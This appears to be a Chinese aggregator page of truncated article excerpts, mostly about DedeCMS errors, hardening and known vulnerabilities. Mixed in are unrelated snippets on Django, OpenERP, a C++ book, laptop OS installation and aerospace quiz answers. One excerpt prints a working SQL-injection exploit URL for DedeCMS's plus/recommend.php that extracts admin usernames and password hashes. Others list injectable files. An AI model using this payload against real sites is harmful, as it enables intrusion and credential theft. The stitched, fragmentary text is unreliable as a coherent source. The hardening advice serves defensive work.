DEDECMS之八 漏洞错误和疑难杂症】的更多相关文章

1.dedecms文章加粗b属性后出现strong或者b标签修改 dedecms的文章,如果设置了加粗的属性后,文章标题那会自动添加一个strong或者是b标签,如何去掉呢,方法如下: a.更改自动添加b标签:打开include目录下的arc.listview.class.php文件:913行 找到下边一段代码 if(preg_match('/c/', $row['flag'])) { //$row['title'] = "<b>".$row['title']."…
我们在迁移网站的时候,可能会出现DedeCMS后台500错误,有可能是因为dedecms不支持PHP5.3.5.4及以上版本,这时我们要改动一些设置才能修复成功.跟着ytkah来修改配置文件吧.首先打开 include/userlogin.class.php这个文件,在287行到308行原内容如下: @session_register($this->keepUserIDTag); $_SESSION[$this->keepUserIDTag] = $this->userID; @sess…
Dedecms安全步骤,安装之后的操作 1 将文件夹dede改名为其他,比如 /256256.com/ 2 搜索ad.dedecms.com,文件D:\WebSite\256256.com\www\gzadmin\templets\login_ad.htm 删除如下这一段: <!--<script type="text/javascript" src="<?php echo $updateHost;?>/dedecms/loginad.<?php…
在使用 dedecms 做网站时,常常会遇到一些棘手的问题,比如:页面图片不显示(src 的地址不对)等等. 1. 更新网站时错误 问题:Call to a member function GetInnerText() on a non-object(在一个非对象类型上调用成员函数 GetInnerText()). 原因:出现这个问题,是因为自定义了内容模型,这个内容模型里有图片字段.当我们去生成网站时,更新网站就会提示此错误. 解决:打开 \include\taglib\channel\img…
织梦/dedecms系统我们都知道是有很多漏洞的,我在调试投票功能的时候正好要用到投票功能,这不就出现了漏洞,下面我就给大家展示如何修复这个织梦投票漏洞 首先我们打开//dedevote.class.php文件,查 找代码 代码如下 $this->dsql->ExecuteNoneQuery("UPDATE `dede_vote` SET totalcount='".($this->VoteInfos['totalcount']+1)."', votenot…
版本:Powered by DedeCMSV57_GBK © 2004-2011 DesDev Inc. 漏洞利用EXP:plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0…
在维护内容的时候, Tag标签输入经常要来回切换输入法,  只能通过','号分隔.  中文用户, 输入法出来的经常是全角的, 经常弄错, 增加了检查的工作量,  现在只要一句JS代码, 就自动替换所有,./;'[]-=等符号为半角,号. 步骤: 1.  打开\dede\templets\album_add.htm文件 2.  查找到<input name="tags" type="text" id="tags" 这个标签, 加上 onkey…
mysql能登进去一下,点任何链接又跳出来,然后就登不上了 解决办法:检查mysql所在盘是否还有空间…
织梦dedecms是新手站长使用得比较多的一个建站开源程序,正因如此,也是被被入侵挂马比较多的程序.下面就来跟大家说一下怎么重新命名dedecms的include文件夹以及plus文件夹来提高网站的安全性,减少被黑客软件扫描到漏洞的概率. dedecms的漏洞主要集中在data.include.plus.dede.member几个文件夹中的php文件里,对于data这个文件夹我们可以把它移到网站的根目录外,dede可以冲命名,member可以删掉,一般用不着,special专题功能 instal…
织梦dedecms,在整个互联网中许多企业网站,个人网站,优化网站都在使用dede作为整个网站的开发架构,dedecms采用php+mysql数据库的架构来承载整个网站的运行与用户的访问,首页以及栏目页生成html静态化,大大的加快的网站访问速度,以及搜索引擎的友好度,利于百度蜘蛛的抓取,深受广大站长以及网站运营者的喜欢.最近我们发现dedecms漏洞,存在高危的parse_str函数sql注入漏洞. 关于该织梦漏洞的详情,我们一步一步来剖析: 首先来介绍下parse_str函数的机制与作用是什…
catalog . 安装及使用方式 . 检查DEDECMS是否为最新版本 . 检查默认安装(install)目录是否存在 . 检查默认后台目录(dede)是否存在 . 检查DedeCMS会员中心是否关闭 . 检查是否存在高风险的若密码账户 . 后台友情链接xss漏洞 . /plus/search.php SQL注入漏洞 . /plus/feedback.php SQL注入漏洞 . /plus/feedback_ajax.php SQL注入或XSS漏洞漏洞 . /include/dedesql.c…
本文译自Vulnerability Scanning with OpenVAS 9 part 1: Installation & Setup系列,本文将融合目前已经发表的四个部分. Part I:安装和使用 安装Openvas 9 要在我们的Kali Linux系统上安装Openvas 9及其依赖项,我们只需运行以下命令: apt-get update && apt-get install openvas 下一步运行安装过程,该过程将安装OpenVAS并下载大量网络漏洞测试(NVT…
常见可疑文件夹: 1:article文件夹:最近很多织梦系统网站根目录被上传article文件件,里面有很多赌博静态违法html页面,可疑直接删除,此类违法信息大部分是由于您的网站存在dedecms安全漏洞,黑客或攻击者利用此漏洞上传木马病毒(webshell文件)获取您的网站控制权限,通过木马病毒上传多个恶意文件,以批量生成很多的html违法页面.:2:找到黑客或攻击者上传的木马文件(伪装成正常文件以.php结尾)并删除,挂马文件特征,大部分文件存在plus.upload.include.de…
顶80SEC的牛. 深掘XSS漏洞场景之XSS Rootkit[完整修订版] EMail: rayh4c#80sec.com Site: http://www.80sec.com Date: 2011-10-15 0×00 前言 众所周知XSS漏洞的风险定义一直比较模糊,XSS漏洞属于高危漏洞还是低风险漏洞一直以来都有所争议.XSS漏洞类型主要分为持久型和非持久型两种: 1. 非持久型XSS漏洞一般存在于URL参数中,需要访问黑客构造好的特定URL才能触发漏洞. 2. 持久型XSS漏洞一般存在于…
Dedecms安全问题已经是老生常谈了.虽然无忧主机php虚拟主机安全性是很高的,但是黑客总是利用dedecms的漏洞进行注入.其实有些时候,是我们对dedecms的安全设置不到位导致的.今天无忧主机小编给大家带来的是dedecms的几个安全设置方面的集合,让您的网站更加安全. 第一点,也是小编认为最有效的一点,就是删除不必要的系统文件.为什么这么说呢?因为很多注入.挂马.刷注册.刷评论,都是通过这些文件来的.比如有些dedecms网站根本没有开启注册功能的必要,就可以把member文件夹删除.…
2018年的中秋节即将来临,我们Sine安全公司,最近接到很多用dedecms程序的企业公司网站客户的反馈,说是公司网站经常被篡改,包括网站首页的标题内容以及描述内容,都被改成了什么北京赛车,北京PK10等等的彩票内容,而且大多数的网站客户都是从百度搜索关键词,点击进公司网站会被直接跳转到赌博网站上去. 对此我们Sine安全已经处理过很多像这样问题的客户网站,这种安全问题普遍的特征就是:频繁反复性质的篡改网站首页,重新在网站后台首页生成后,被篡改的内容就会清除,但没过多久就又被篡改了,使很多网站…
0x00 Apache文件名解析漏洞 Apache是一个Web服务器,可以提供web服务.配合java中间件.PHP实现动态页面访问. Apache和PHP通过接口接入后,Apache接受用户的请求,并将请求传送给php.exe,php.exe程序执行完毕后,把结果发送给用户.在Apache将文件内容交给PHP的时候,Apache会从右到左对文件名进行判断,确保只有.php的后缀文件得到解析,当文件名是demo.php.bak时,按照httpd.conf中的定义,.bak是不可识别的文件后缀,那…
版权和内容说明: 这篇文章不是本站编写,是从网络上摘抄的,但是经过了本站的改写优化,并将内容,格式规范化. 本篇说明:这篇文章结合了前辈们前几年一路挖掘出来的主流程序漏洞以及思路, 小编写在前面是想让大家大致了解一下,因为<渗透课程>以后的内容,就是围绕着本篇所涉及的内容进行深度逻辑原理剖析. 这是一篇比较完全的基本渗透笔记.看不懂没关系,后面会一一讲解不过本章的内容读者们要尽量保存,可能会在拿站的时候应用到呢! 常见网站程序asp类: foosun(风讯) kesion(科汛) newasp…
问题描述: 笔记本电脑W8系统使用不习惯,想要换成W7系统,但不管是用光盘安装亦或是用U盘安装,在设置系统启动项的时候,选择从光盘启动或从U盘启动,但是回车点了之后没反应. 下面就说说问题的原因及解决方法: 知识介绍: 微软公司发布Win8系统以后,现在很多电脑厂商都把Win8系统出厂预装到笔记本当中,联想Thinkpad E430电脑也不例外,由于Win8系统的操作界面发生了很多改变,有很多人还不太喜欢使用电脑出厂预装的Win8系统,所以想要把Thinkpad E430电脑中出厂预装的Win8…
info:Djangourl:https://www.oschina.net/p/djangodetail: Django 是 Python 编程语言驱动的一个开源模型-视图-控制器(MVC)风格的 Web 应用程序框架.使用 Django,我们在几分钟之内就可以创建高品质.易维护.数据库驱动的应用程序. Django 框架的核心组件有: 用于创建模型的对象关系映射 为最终用户设计的完美... info:OpenERPurl:https://www.oschina.net/p/openerpde…
info:更多Django信息url:https://www.oschina.net/p/djangodetail: Django 是 Python 编程语言驱动的一个开源模型-视图-控制器(MVC)风格的 Web 应用程序框架.使用 Django,我们在几分钟之内就可以创建高品质.易维护.数据库驱动的应用程序. Django 框架的核心组件有: 用于创建模型的对象关系映射 为最终用户设计的完美... info:更多OpenERP信息url:https://www.oschina.net/p/o…
本文内容摘抄自C++经典书籍:<Thinking in C++>   操作概念:OOP程序像什么 我们已经知道,用C 语言编写的过程程序就是一些数据定义和函数调用.要理解这种程序的含义,程序员必须掌握函数调用和函数实现的本身.这就是过程程序需要中间表示的原因.中间表示容易引起混淆,因为中间表示的表述是原始的,更偏向于计算机,而不偏向于所解决的问题. 因为 C++ 向 C 语言增加了许多新概念,所以程序员很自然地认为,C + +程序中的m a i n ( )会比功能相同的 C 程序更复杂. 但令…
本文内容摘抄自C++经典书籍:<Thinking in C++>   操作概念:OOP程序像什么 我们已经知道,用C 语言编写的过程程序就是一些数据定义和函数调用.要理解这种程序的含义,程序员必须掌握函数调用和函数实现的本身.这就是过程程序需要中间表示的原因.中间表示容易引起混淆,因为中间表示的表述是原始的,更偏向于计算机,而不偏向于所解决的问题. 因为 C++ 向 C 语言增加了许多新概念,所以程序员很自然地认为,C + +程序中的m a i n ( )会比功能相同的 C 程序更复杂. 但令…
攻击目标: 应用HTTP协议的服务器和客户端.以及运行在服务器上的Web应用等. 攻击基础: HTTP是一种通用的单纯协议机制.在Web应用中,从浏览器那接受到的HTTP请求的全部内容,都可以在客户端自由地变更.篡改,Web应用可能会接收到和服务器完全不相同的.被刻意篡改的内容. 攻击对象: URL查询字段或表单.HTTP首部.Cookit等. 在HTTP的请求报文内加载攻击代码,就能发起Web应用的攻击,通过URL查询字段或表单.HTTP首部.Cookit等途径把攻击代码传入,若代码存在安全漏…
尊敬的客户,您好!     感谢广大客户对我司工作的信任和支持!      我司在最近的一个多月内陆续发现多起因 DedeCMS 安全漏洞造成网站被上传恶意脚本的事件,入侵者可利用恶意脚本对外发送大量数据包,严重占用CPU资源与服务器带宽,影响极为恶劣.为保证服务稳定,即日起一旦发现网站存在此类恶意脚本,我们将立即暂停该网站的服务直到问题修复.如果您正在使用 DedeCMS,请立即检查是否已经存在恶意脚本,并更新程序到最新版本或应用相关补丁.     迄今为止,我们发现的恶意脚本文件有    …
具体需求 这几天生产环境服务器又进行了安全扫描,每次都会报一下漏洞错误.虽然只有一个高危问题,但是每次看到ssh远程漏洞都很烧脑 "主要是里面坑太多了",闲话就不说了,今天我们来看看从redhat7.4 的openssh7.4.7.6.8.1离线网的环境中升级到openssh8.4p1吧!!  漏洞以及环境问题 OpenSSH 命令注入漏洞(CVE-2020-15778) 报的远程漏洞问题,因为Linux服务器都在公司内部,不能连接公网.  需要注意 为了防止升级失败,可以在升级之前安…
一,基础学习 01.基础学习 [[编码总结]] [[JSON三种数据解析方法]] [[js加密,解密]] [[Internet保留地址和非保留地址.内网和公网.VNC和UltraVN]] 代理 [[SOCKS4.SOCKS5和HTTP代理]] [[Windows - Netch 使用教程]] [[Netch设置端口ip进行转发流量]] [[全能终端神器--MobaXterm]] 通信协议 [[IIOP-百度百科]] 互联网内部对象请求代理协议 二.信息收集 02.信息收集 1.[[信息收集-汇总…
航空航天尔雅 选择题1. 已经实现了<天方夜谭>中的飞毯设想.—— A——美国2. 地球到月球大约—— C 38 万公里3. 建立了航空史上第一条定期空中路线—— B——德国4. 对于孔明灯来说,最重要的是—— C——自重5. 世界公认的人类第一次重于空气的,有动力驱动的飞行器进行的载人飞行的空速是每小时—— B——46 公里6. 一战期间飞机使用的是双翼飞机—— B——双翼7. 航空业才逐渐兴起—— B——(一次世界大战后)8. 德国制造了第一架喷气式飞机—— D——德国9. 美国实现了人类…
SSV-97074 Date 类型 前台任意密码修改 影响范围 前置条件 CVE-2018-20129 Date 类型前台文件上传 影响范围 前置条件(1)前台登录(2)/member/article_add.php可访问 SSV-97087 Date 类型越权 影响范围 前置条件(1)有前台登录账号 CVE-2018-9175 Date 类型 影响范围 前置条件(1)可登录后台 /member/reg_new.php SQL 注入漏洞 /member/buy_action.php SQL 注入…
dedecms织梦建站后怎么防止被黑,加强安全漏洞措施? 很多人反映dedecms织梦网站被黑的情况,因为织梦相对来说漏洞还是挺多的,特别是新建设的站点,有些目录.文件该删的删,权限及安全都要设置,以防止被黑,下面赵一八笔记教大家怎么将dedecms的安全做到极致. 一.安全删除篇: 织梦的功能模块是很多的,对于一般企业而言,简单的文档发布就够用了,删除一些不用的模块是做好安全的第一步.可以删除的模块如下,请各位朋友按照需求删除.尤其是plus目录的一些文件,未用到的尽量删除,因为织梦历史上漏洞…